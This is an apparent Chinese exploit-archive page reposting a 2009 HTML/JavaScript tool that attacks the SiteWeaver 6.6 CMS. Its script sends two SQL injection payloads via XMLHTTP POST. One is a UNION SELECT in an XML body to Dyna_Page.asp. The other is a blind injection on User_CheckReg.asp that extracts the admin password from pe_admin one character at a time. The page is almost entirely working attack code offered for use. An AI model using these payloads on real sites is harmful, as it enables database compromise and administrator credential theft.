首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 动易SiteWeaver6.6版最新漏洞利用工具 来源：黑客防线 作者：Cschii 发布时间：2009-03-02   <script>  function gb2utf8(data){   var glbEncode = [];   gb2utf8_data = data;   execScript("gb2utf8_data = MidB(gb2utf8_data, 1)", "VBScript");   var t=escape(gb2utf8_data).replace(/%u/g,"").replace(/(.{2})(.{2})/g,"%$2%$1").replace(/%([A-Z].)%(.{2})/g,"@$1$2");   tt=t.split("@");   var i=0,j=t.length,k;   while(++i<j) {   k=t[i].substring(0,4);   if(!glbEncode[k]) {   gb2utf8_char = eval("0x"+k);   execScript("gb2utf8_char = Chr(gb2utf8_char)", "VBScript");   glbEncode[k]=escape(gb2utf8_char).substring(1,6);   }   t[i]=glbEncode[k]+t[i].substring(4);   }   gb2utf8_data = gb2utf8_char = null;   return unescape(t.join("%"));   }     function PostData(){   var url = document.getElementById("url").value;   var post= document.getElementById("post").value;   var oXmlHttp = new ActiveXObject("Microsoft.XMLHTTP");   oXmlHttp.open("POST", url, false);   if (url.indexOf("User_CheckReg.asp")>0){oXmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");}   oXmlHttp.send(post);   var GetResult=gb2utf8(oXmlHttp.responseBody);   if (oXmlHttp.readyState == 4) {   if (oXmlHttp.status == 200) {   document.getElementById("getResult").value = GetResult;   }   }   }   function Inject(i){   if (i==1){   document.getElementById("url").value="http://127.0.0.1:81/pe2006/Dyna_Page.asp";   document.getElementById("post").value='<?xml version="1.0" encoding="gb2312"?><root><id>21</id><page>1</page><value>0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,DownloadUrl,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from PE_soft where softid=1|1</value></root>';   }   else   {   document.getElementById("url").value="http://127.0.0.1:81/pe2006/Reg/User_CheckReg.asp";   document.getElementById("post").value="UserName=admino'%20union%20select%201%20from%20pe_admin%20where%20username='admin'band%20Mid(password,1,1)>'0";   }   }     </script>  <BODY>  <div align="center">动易SiteWeaver6.6版最新漏洞利用工具</div>  请输入URL：<br>  <INPUT TYPE="text" id="url" value="http://127.0.0.1:81/pe2006/Dyna_Page.asp" style="width:90%;">    <br>  输入Post：<br>  <textArea id="post" style="width:90%; height:80;"><?xml version="1.0" encoding="gb2312"?>  <root><id>21</id><page>1</page><value>0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,DownloadUrl,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from PE_soft where softid=1|1</value></root></textArea>  <div align="center"><INPUT TYPE="button" value="漏洞一示例" onClick="Inject(1);">   <INPUT TYPE="button" value=" 提 交 " onClick="PostData();">   <INPUT TYPE="button" value="漏洞二示例" onClick="Inject(2);"></div>  <hr size=2 >  注入结果：<br>  <textArea id="getResult" style="width:90%; height:200;"></textArea>  </BODY>    [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Demium CMS 0.2.1B Multiple Vul ·Hex Workshop v6 (.HEX File) Lo ·Orbit <= 2.4 Long Hostname Rem ·POP Peeper 3.4.0.0 UIDL Remote ·Proof of concept denial of ser ·Coppermine Photo Gallery <= 1. ·POP Peeper version 3.4.0.0 UID ·Apple MACOS X xnu <= 1228.x Lo ·HTC Touch vCard over IP Denial ·pPIM 1.0 Multiple Remote Vulne ·Merak Media PLayer 3.2 m3u Fil ·MDPro Module My_eGallery (pid)   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved